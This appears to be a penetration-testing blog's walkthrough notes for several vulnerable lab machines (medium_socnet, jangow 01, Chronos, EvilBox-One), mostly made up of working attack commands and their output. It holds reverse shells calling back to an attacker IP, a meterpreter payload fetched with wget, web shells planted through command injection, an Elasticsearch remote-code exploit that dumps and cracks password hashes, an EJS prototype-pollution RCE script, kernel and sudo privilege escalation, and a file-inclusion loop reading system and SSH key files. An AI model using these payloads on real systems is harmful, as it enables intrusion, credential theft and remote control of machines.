Penetration testing target machines (walkthrough notes)
jerem1ah Lv4

0x00 Target machines

Handy one-liners:

Upgrade to an interactive PTY:

```shell
python -c 'import pty;pty.spawn("/bin/bash")'
```

PHP reverse shell (mkfifo + nc):

```php
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 443 >/tmp/f');?>
```

Python reverse shell:

```python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",7779));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
```

Target: medium_socnet

https://www.cnblogs.com/shadow-/p/16815020.html

Python reverse shell:

```python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",7779));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
```

Metasploit connection:

On the attacker (192.168.56.102), build the payload and serve it over Apache:

```shell
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.56.102 lport=7778 -f elf -o /var/www/html/mshell.elf
service apache2 start
```

On the target, fetch it and make it executable:

```shell
wget http://192.168.56.102:80/mshell.elf
chmod 777 mshell.elf
chmod +x mshell.elf
```

Handler on the attacker:

```text
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.56.102
set lport 7778
run
```

Internal network scan:

Inside the meterpreter session, look at the interfaces, then route 172.17.0.0/16 through the session:

```text
> shell
> ip a

run autoroute -s 172.17.0.0/16
run autoroute -p
background
```
Start a SOCKS5 proxy in msf so local tools can reach that network:

```text
use auxiliary/server/socks_proxy
set VERSION 5
set SRVHOST 192.168.56.102
show options
run
```
Point proxychains at the proxy and scan the internal range through it:

```shell
touch proxychains.conf
sudo cat /etc/proxychains4.conf > ./proxychains.conf
vim ./proxychains.conf   # add the line: socks5 192.168.56.102 1080
proxychains4 -f ./proxychains.conf nmap -Pn -sT 172.17.0.0/24
```
Back in the session, `ip` is not a meterpreter command, but `arp -a` lists the neighbours the host has already seen:

```text
msf6 auxiliary(server/socks_proxy) > sessions -1
[*] Starting interaction with 1...

meterpreter > ip a
[-] Unknown command: ip
meterpreter > arp -a

ARP cache
=========

IP address   MAC address        Interface
----------   -----------        ---------
172.17.0.1   02:42:fb:53:61:32
172.17.0.3   02:42:ac:11:00:03
```
```text
proxychains4 -f ./proxychains.conf nmap -Pn -sT 172.17.0.1
[proxychains] Dynamic chain  ...  192.168.56.102:1080  ...  172.17.0.1:3324 <--socket error or timeout!
[proxychains] Dynamic chain ... 192.168.56.102:1080 ... 172.17.0.1:1009 <--socket error or timeout!
[proxychains] Dynamic chain ... 192.168.56.102:1080 ... 172.17.0.1:9595 <--socket error or timeout!
[proxychains] Dynamic chain ... 192.168.56.102:1080 ... 172.17.0.1:9485 <--socket error or timeout!
[proxychains] Dynamic chain ... 192.168.56.102:1080 ... 172.17.0.1:617 <--socket error or timeout!
Nmap scan report for 172.17.0.1 (172.17.0.1)
Host is up (0.0040s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 4.80 seconds
```
```text
proxychains4 -f ./proxychains.conf nmap -Pn -sT -sV 172.17.0.3
[proxychains] Dynamic chain  ...  192.168.56.102:1080  ...  172.17.0.3:9200 <--socket error or timeout!
[proxychains] Dynamic chain ... 192.168.56.102:1080 ... 172.17.0.3:9200 <--socket error or timeout!
[proxychains] Dynamic chain ... 192.168.56.102:1080 ... 172.17.0.3:9200 ... OK
Nmap scan report for 172.17.0.3 (172.17.0.3)
Host is up (0.10s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
9200/tcp open  http    Elasticsearch REST API 1.4.2 (name: Tyrant; cluster: elasticsearch; Lucene 4.10.2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.92 seconds
```

Elasticsearch 1.4.2 has a public exploit in exploitdb; the script is Python 2, so set that up and run it through the proxy:

```shell
searchsploit Elasticse
sudo apt-get install python2    # install python2
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py && python2 get-pip.py   # install pip for python2 (skip if already present)
python2 -m pip install requests   # install the requests package
proxychains4 -f ./proxychains.conf python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.3   # run the 36337.py script
```
In the shell the script gives on 172.17.0.3:

```text
ls
cat passwords
```

```text
~$ cat passwords
[proxychains] Dynamic chain ... 192.168.56.102:1080 ... 172.17.0.3:9200 ... OK
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
```
The hashes are unsalted MD5 and the file even states the password format, so they can be looked up online at https://md5.cn/ :


```text
john:1337hack;
test:1234test;
admin:1111pass;
root:1234pass;
jane:1234jane
```
SSH in as john on the host:

```shell
ssh -p 22 john@192.168.56.103
```

```shell
id
uname -a
```

Search for a local exploit matching the kernel version:

```shell
searchsploit Linux 3.13.0
```
Build the overlayfs exploit (37292.c, CVE-2015-1328) on Kali and serve it together with the ofs-lib.so it needs:

```shell
cat /usr/share/exploitdb/exploits/linux/local/37292.c
cd /home/kali/Desktop/
cat /usr/share/exploitdb/exploits/linux/local/37292.c > ./37292.c
vim ./37292.c
gcc -o ./exp ./37292.c
cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so ./ofs-lib.so
python -m http.server 8081
```

On the target:

```shell
wget http://192.168.56.102:8081/exp && wget http://192.168.56.102:8081/ofs-lib.so
chmod +x ./exp && chmod +x ./ofs-lib.so && cp ./ofs-lib.so /tmp/ofs-lib.so
```
Check the target's glibc and kernel versions:

```text
john@socnet:~$ ldd --version
ldd (Ubuntu EGLIBC 2.19-0ubuntu6) 2.19
Copyright (C) 2014 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
```

```text
john@socnet:~$ uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
```


Target: jangow 01

Host discovery and port scan:

```shell
ifconfig
sudo su
arp-scan -l -I eth0
nmap 192.168.56.118
```

Command injection through the `buscar` parameter of busque.php, used to drop a web shell:

```text
http://192.168.56.118/site/busque.php?buscar=id
http://192.168.56.118/site/busque.php?buscar=echo '<?php eval($_POST["pass"]);' > 666.php
http://192.168.56.118/site/busque.php?buscar=echo '<?php eval($_POST[1]);' > shell.php
```

PHP reverse shell:

```php
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 443 >/tmp/f');?>
```

Python interactive shell:

```shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

```shell
whoami
uname -a          # kernel version
lsb_release -a    # distribution release
```

Look for a local exploit for Ubuntu 16.04, mirror it and build it statically:

```shell
searchsploit ubuntu 16.04
searchsploit -m 45010.c
gcc --static 45010.c -o exp2
```


Target: Chronos

https://www.cnblogs.com/shadow-/p/16828146.html

```shell
ifconfig
arp-scan -l -I eth0
nmap 192.168.56.104
```

```text
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.56.104
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-10 00:33 EDT
Nmap scan report for 192.168.56.104 (192.168.56.104)
Host is up (0.00021s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 08:00:27:F8:EE:F0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
```
```text
┌──(root㉿kali)-[/home/kali]
└─# nmap -sV 192.168.56.104
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-10 00:36 EDT
Nmap scan report for 192.168.56.104 (192.168.56.104)
Host is up (0.00017s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open  http     Node.js Express framework
MAC Address: 08:00:27:F8:EE:F0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.89 seconds
```
Request observed against port 8000, and the User-Agent it is sent with:

```text
http://192.168.56.104:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL
User-Agent: Chronos
```

Command injection

The `format` value is base58-encoded. Payloads and their encoded forms (in the comment):

```text
&& ls #5Jdixo4
&&ls #yZSGA
```

```text
http://192.168.56.104:8000/date?format=yZSGA
User-Agent: Chronos
```

```text
&& ls -lh /bin
F2SaSe3T3SZy3G4RcHK
http://192.168.56.104:8000/date?format=F2SaSe3T3SZy3G4RcHK
```
```text
Mon Jul 10 05:29:12 UTC 2023
total 15M
```

Three injected commands that write and run a reverse-shell script, followed by their base58 encodings:

```text
&& touch a.sh
&& echo 'bash -i >& /dev/tcp/192.168.56.102/7779 0>&1' > ./a.sh
&& bash ./a.sh
```

```text
F2SaUcu11quzvQKEJBT
B2K4FCAU1SDpFs1S5Lz6BZeyhpypkmQyyYfeZ3717VL7rKXQ59JFUhUZnxUsfycU3axZP25hRoQq5mibLkoRhy
F2SaQ9Dykw37PPsvZhq
```

Got the reverse shell:

```shell
id
uname -a
cd /home && ls
```

```shell
cd /opt/chronos
ls -alh
```
```text
www-data@chronos:/opt/chronos$ ls -alh
ls -alh
total 60K
drwxr-xr-x  3 www-data www-data 4.0K Jul 10 05:33 .
drwxr-xr-x  4 root     root     4.0K Jul 30  2021 ..
-rw-r--r--  1 www-data www-data 1.4K Aug  3  2021 app.js
-rw-r--r--  1 www-data www-data   45 Jul 10 05:39 a.sh
drwxr-xr-x 56 www-data www-data 4.0K Jul 30  2021 node_modules
-rw-r--r--  1 www-data www-data   97 Jul 30  2021 package.json
-rw-r--r--  1 www-data www-data  33K Jul 30  2021 package-lock.json
```
```text
www-data@chronos:/opt/chronos$ cat package.json
cat package.json
{
  "dependencies": {
    "bs58": "^4.0.1",
    "cors": "^2.8.5",
    "express": "^4.17.1"
  }
}
```

  • bs58: looks familiar? It is the base58 encoding seen earlier. Not much help for privilege escalation.
  • cors: middleware that handles cross-origin requests between client and server. Not much help for privilege escalation.
  • express: builds on the native http module so server-side logic can be written efficiently; if there is a useful vulnerability, it should be in here.
```javascript
// created by alienum for Penetration Testing
const express = require('express');
const { exec } = require("child_process");
const bs58 = require('bs58');
const app = express();

const port = 8000;

const cors = require('cors');


app.use(cors());

app.get('/', (req,res) =>{

    res.sendFile("/var/www/html/index.html");
});

app.get('/date', (req, res) => {

    var agent = req.headers['user-agent'];
    var cmd = 'date '; // start building the command string
    const format = req.query.format;
    const bytes = bs58.decode(format);
    var decoded = bytes.toString();
    var concat = cmd.concat(decoded);
    if (agent === 'Chronos') {
        if (concat.includes('id') || concat.includes('whoami') || concat.includes('python') || concat.includes('nc') || concat.includes('bash') || concat.includes('php') || concat.includes('which') || concat.includes('socat')) {

            res.send("Something went wrong");
        }

        // executes the command: the key to exploitation
        exec(concat, (error, stdout, stderr) => {
            if (error) {
                console.log(`error: ${error.message}`);
                return;
            }
            if (stderr) {
                console.log(`stderr: ${stderr}`);
                return;
            }
            res.send(stdout);
        });
    }
    else{

        res.send("Permission Denied");
    }
})

app.listen(port,() => {

    console.log(`Server running at ${port}`);

})
```
```shell
cd ..
ls -alh
cd chronos-v2
cd backend
cat server.js
```
```javascript
const express = require('express');
const fileupload = require("express-fileupload");
const http = require('http')

const app = express();

app.use(fileupload({ parseNested: true }));

app.set('view engine', 'ejs');
app.set('views', "/opt/chronos-v2/frontend/pages");

app.get('/', (req, res) => {
    res.render('index')
});

const server = http.Server(app);
const addr = "127.0.0.1"
const port = 8080;
server.listen(port, addr, () => {
    console.log('Server listening on ' + addr + ' port ' + port);
});
```

  • package.json names server.js as the server's entry file; it uses three modules:
    • ejs: an embedded JavaScript template engine
    • express: the same as before
    • express-fileupload: middleware for file uploads under the Express framework
  • server.js shows that at runtime the service listens only on the target's local address, 127.0.0.1 port 8080

Exploit script (exp3.py):

```python
import requests

cmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.102/7778 0>&1"'

# pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

# execute command
requests.get('http://127.0.0.1:8080')
```
On Kali, save the script, serve it, and start a listener for the shell:

```shell
touch exp3.py
vim exp3.py
python3 -m http.server 8080
```

```shell
nc -lvvp 7778
```

On the target (the backend only listens on 127.0.0.1:8080, so the script has to run from there):

```shell
cd /tmp
wget http://192.168.56.102:8080/exp3.py
python3 exp3.py
```
```text
imera@chronos:~$ cat user.txt
cat user.txt
byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK
```

To escalate to root: there are three common ways to escalate privileges on Linux:

1. kernel vulnerabilities; 2. misconfigured SUID permissions; 3. careless sudo rules.

```shell
sudo -l
```

```text
imera@chronos:~$ sudo -l
sudo -l
Matching Defaults entries for imera on chronos:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User imera may run the following commands on chronos:
    (ALL) NOPASSWD: /usr/local/bin/npm *
    (ALL) NOPASSWD: /usr/local/bin/node *
```

Privilege escalation through node (sudo allows node with any arguments, so it can spawn a root shell):

```shell
sudo node -e 'child_process.spawn("/bin/bash",{stdio:[0,1,2]})'
```

Python interactive shell:

```shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

```text
root@chronos:/root# cat root.txt
cat root.txt
YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK
```


Target: EvilBox—One

https://www.cnblogs.com/shadow-/p/16878609.html

https://www.cnblogs.com/upfine/p/16929756.html

```shell
arp-scan -l -I eth0
nmap -sV 192.168.56.105
dirsearch -u "http://192.168.56.105/" -x 403
```

```text
[01:16:29] Starting:
[01:16:47] 200 -   10KB - /index.html
[01:16:54] 200 -    12B - /robots.txt
[01:16:54] 301 -   317B - /secret  ->  http://192.168.56.105/secret/
[01:16:54] 200 -     4B - /secret/
Task Completed
```

Directory brute force of /secret with gobuster and the SecLists wordlists (https://github.com/danielmiessler/SecLists):

```shell
gobuster dir --url='192.168.56.105:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
```
```text
┌──(root㉿kali)-[/usr/share]
└─# gobuster dir --url='192.168.56.105:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.105:80/secret
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              txt,php,html,jsp
[+] Timeout:                 10s
===============================================================
2023/07/13 02:55:43 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 4]
/evil.php             (Status: 200) [Size: 0]
Progress: 707006 / 708545 (99.78%)
===============================================================
2023/07/13 02:57:40 Finished
===============================================================
```

Fuzz the parameter name and value of evil.php with ffuf. var.txt holds the candidate values:

```text
0
1
a
'
"
(
[
{
<
,
;
?
`
/
\
%
true
false
../robots.txt
H4x0r
```

```shell
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.105/secret/evil.php?params=var -fs 0
```

```text
[Status: 200, Size: 12, Words: 2, Lines: 2, Duration: 21ms]
    * params: command
    * var: ../robots.txt
```

The `command` parameter includes a file, so the php://filter wrapper can be used to read the source of evil.php itself:

```text
http://192.168.56.105/secret/evil.php?command=../robots.txt
```

```shell
curl "http://192.168.56.105/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=../robots.txt"

curl "http://192.168.56.105/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=./evil.php" -m 1 -s | base64 --decode
```

```php
<?php
$filename = $_GET['command'];
include($filename);
?>
```

Linux path wordlist (file.txt):

/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/apache/php/php.ini
/bin/php.ini
/etc/anacrontab
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/at.allow
/etc/at.deny
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/fstab
/etc/host.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/etc/httpd/htdocs/index.php
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/ld.so.conf
/etc/motd
/etc/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/passwd
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/phpmyadmin/config.inc.php
/etc/resolv.conf
/etc/shadow
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key.pub
/etc/ssh/ssh_host_rsa_key.pub
/etc/sysconfig/network
/etc/sysconfig/network
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/home/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/NetServer/bin/stable/apache/php.ini
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.html
/opt/www/htdocs/index.php
/opt/xampp/etc/php.ini
/PHP/php.ini
/php/php.ini
/php4/php.ini
/php5/php.ini
/root/.atftp_history
/root/.bashrc
/root/.bash_history
/root/.mysql_history
/root/.nano_history
/root/.php_history
/root/.profile
/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/anaconda-ks.cfg
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_logerror_log.old
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/php.ini
/usr/local/httpd/conf/httpd.conf
/usr/local/httpd2.2/htdocs/index.html
/usr/local/httpd2.2/htdocs/index.php
/usr/local/lib/php.ini
/usr/local/mysql/bin/mysql
/usr/local/mysql/my.cnf
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/php5.ini
/usr/local/share/examples/php/php.ini
/usr/local/share/examples/php4/php.ini
/usr/local/tomcat5527/bin/version.sh
/usr/local/Zend/etc/php.ini
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
/var/apache2/config.inc
/var/httpd/conf/httpd.conf
/var/httpd/conf/php.ini
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.html
/var/httpd/htdocs/index.php
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/httpd.conf
/var/local/www/conf/php.ini
/var/log/access.log
/var/log/access_log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/error.log
/var/log/error_log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql.log
/var/log/mysqlderror.log
/var/mail/root
/var/mysql.log
/var/spool/cron/crontabs/root
/var/spool/mail/root
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/www/htdocs/index.php
/var/www/index.html
/var/www/index.php
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
/web/conf/php.ini
/www/conf/httpd.conf
/www/htdocs/index.html
/www/htdocs/index.php
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
root/.ssh/authorized_keys
root/.ssh/identity
root/.ssh/identity.pub
root/.ssh/id_dsa
root/.ssh/id_dsa.pub
root/.ssh/id_rsa
root/.ssh/id_rsa.pub
Loop over the wordlist and request each path through the include (s.sh):

```shell
#!/bin/bash
for i in $(cat ./file.txt)
do
    echo "#######################"
    echo ">>>$i:"
    curl "http://192.168.56.105/secret/evil.php?command=$i" -m 1 -s
    sleep 1
done
```
```text
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ./s.sh
################################################
>>>/apache/apache/conf/httpd.conf:
################################################
>>>/apache/apache2/conf/httpd.conf:
################################################
>>>/apache/php/php.ini:
################################################
>>>/bin/php.ini:
################################################
>>>/etc/anacrontab:
################################################
>>>/etc/apache/apache.conf:
################################################
>>>/etc/apache/httpd.conf:
################################################
>>>/etc/apache2/apache.conf:
################################################
>>>/etc/apache2/httpd.conf:
################################################
>>>/etc/apache2/sites-available/default:
################################################
>>>/etc/apache2/vhosts.d/00_default_vhost.conf:
################################################
>>>/etc/at.allow:
################################################
>>>/etc/at.deny:
################################################
>>>/etc/cron.allow:
################################################
>>>/etc/cron.deny:
################################################
>>>/etc/crontab:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
```
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
################################################
>>>/etc/fstab:
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point> <type> <options> <dump> <pass>
# / was on /dev/sda1 during installation
UUID=d0c20a19-945b-4f91-8ea2-8466c005b946 / ext4 errors=remount-ro 0 1
# swap was on /dev/sda5 during installation
UUID=635c225b-1f26-4d4e-912a-87db360ddbb1 none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
################################################
>>>/etc/host.conf:
multi on
################################################
>>>/etc/httpd/conf.d/httpd.conf:
################################################
>>>/etc/httpd/conf.d/php.conf:
################################################
>>>/etc/httpd/conf/httpd.conf:
################################################
>>>/etc/httpd/htdocs/index.html:
################################################
>>>/etc/httpd/htdocs/index.php:
################################################
>>>/etc/httpd/logs/access.log:
################################################
>>>/etc/httpd/logs/access_log:
################################################
>>>/etc/httpd/logs/error.log:
################################################
>>>/etc/httpd/logs/error_log:
################################################
>>>/etc/httpd/php.ini:
################################################
>>>/etc/init.d/httpd:
################################################
>>>/etc/init.d/mysql:
################################################
>>>/etc/ld.so.conf:
include /etc/ld.so.conf.d/*.conf

################################################
>>>/etc/motd:
################################################
>>>/etc/my.cnf:
################################################
>>>/etc/mysql/my.cnf:
################################################
>>>/etc/mysql/my.cnf:
################################################
>>>/etc/network/interfaces:
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
allow-hotplug enp0s3
iface enp0s3 inet dhcp
################################################
>>>/etc/networks:
default 0.0.0.0
loopback 127.0.0.0
link-local 169.254.0.0

################################################
>>>/etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
################################################
>>>/etc/php.ini:
################################################
>>>/etc/php/apache/php.ini:
################################################
>>>/etc/php/apache2/php.ini:
################################################
>>>/etc/php/cgi/php.ini:
################################################
>>>/etc/php/php.ini:
################################################
>>>/etc/php/php4/php.ini:
################################################
>>>/etc/php4.4/fcgi/php.ini:
################################################
>>>/etc/php4/apache/php.ini:
################################################
>>>/etc/php4/apache2/php.ini:
################################################
>>>/etc/php4/cgi/php.ini:
################################################
>>>/etc/php5/apache/php.ini:
################################################
>>>/etc/php5/apache2/php.ini:
################################################
>>>/etc/php5/cgi/php.ini:
################################################
>>>/etc/phpmyadmin/config.inc.php:
################################################
>>>/etc/resolv.conf:
domain home
search home
nameserver 192.168.1.1
################################################
>>>/etc/shadow:
################################################
>>>/etc/ssh/sshd_config:
# $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $

# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

